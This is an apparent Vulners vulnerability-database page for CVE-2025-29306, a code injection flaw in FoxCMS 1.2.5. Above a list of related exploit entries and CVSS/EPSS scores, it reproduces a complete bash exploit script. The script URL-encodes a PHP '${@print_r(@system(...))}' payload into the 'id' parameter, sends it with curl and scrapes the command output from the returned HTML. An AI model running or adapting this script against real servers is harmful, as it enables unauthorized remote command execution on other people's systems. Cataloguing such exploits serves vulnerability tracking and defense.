Vulners
Lucene search
FoxCMS 1.2.5 - Remote Code Execution (RCE)
| Reporter | Title | Published | Views | Family All 21 |
|---|---|---|---|---|
 | Exploit for Code Injection in Foxcms | 22 Apr 202509:00 | – | githubexploit |
| Exploit for Code Injection in Foxcms | 25 Mar 202508:12 | – | githubexploit |
| Exploit for Code Injection in Foxcms | 18 Sep 202504:53 | – | githubexploit |
| Exploit for Code Injection in Foxcms | 26 Nov 202518:13 | – | githubexploit |
| Exploit for Code Injection in Foxcms | 10 May 202513:14 | – | githubexploit |
| Exploit for Code Injection in Foxcms | 25 Apr 202503:45 | – | githubexploit |
| Exploit for Code Injection in Foxcms | 7 Jan 202605:08 | – | githubexploit |
| Exploit for Code Injection in Foxcms | 17 Apr 202508:44 | – | githubexploit |
 | CVE-2025-29306 | 27 Mar 202520:50 | – | circl |
 | FoxCMS 代码注入漏洞 | 27 Mar 202500:00 | – | cnnvd |
10
# Date: 2025-04-17
# Exploit Title:
# Exploit Author: VeryLazyTech
# Vendor Homepage: https://www.foxcms.org/
# Software Link: https://www.foxcms.cn/
# Version: FoxCMS v.1.2.5
# Tested on: Ubuntu 22.04, Windows Server 2019
# CVE: CVE-2025-29306
# Website: https://www.verylazytech.com
#!/bin/bash
banner() {
cat <<'EOF'
______ _______ ____ ___ ____ ____ ____ ___ _____ ___ __
/ ___\ \ / / ____| |___ \ / _ \___ \| ___| |___ \ / _ \___ / / _ \ / /_
| | \ \ / /| _| __) | | | |__) |___ \ __) | (_) ||_ \| | | | '_ \
| |___ \ V / | |___ / __/| |_| / __/ ___) | / __/ \__, |__) | |_| | (_) |
\____| \_/ |_____| |_____|\___/_____|____/ |_____| /_/____/ \___/ \___/
__ __ _ _____ _
\ \ / /__ _ __ _ _ | | __ _ _____ _ |_ _|__ ___| |__
\ \ / / _ \ '__| | | | | | / _` |_ / | | | | |/ _ \/ __| '_ \
\ V / __/ | | |_| | | |__| (_| |/ /| |_| | | | __/ (__| | | |
\_/ \___|_| \__, | |_____\__,_/___|\__, | |_|\___|\___|_| |_|
|___/ |___/
@VeryLazyTech - Medium
EOF
}
# Call the banner function
banner
set -e
# Check for correct number of arguments
if [ "$#" -ne 2 ]; then
printf "Usage: $0 <url> <command>"
exit 1
fi
TARGET=$1
# Encode payload
ENCODED_CMD=$(python3 -c "import urllib.parse; print(urllib.parse.quote('\${@print_r(@system(\"$2\"))}'))")
FULL_URL="${TARGET}?id=${ENCODED_CMD}"
echo "[*] Sending RCE payload: $2"
HTML=$(curl -s "$FULL_URL")
# Extract <ul> from known XPath location using xmllint
UL_CONTENT=$(echo "$HTML" | xmllint --html --xpath "/html/body/header/div[1]/div[2]/div[1]/ul" - 2>/dev/null)
# Strip tags, clean up
CLEANED=$(echo "$UL_CONTENT" | sed 's/<[^>]*>//g' | sed '/^$/d' | sed 's/^[[:space:]]*//')
echo
echo "[+] Command Output:"
echo "$CLEANED"Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
19 Apr 2025 00:00Current
7High risk
Vulners AI Score7
CVSS 3.19.8
EPSS0.86208
SSVC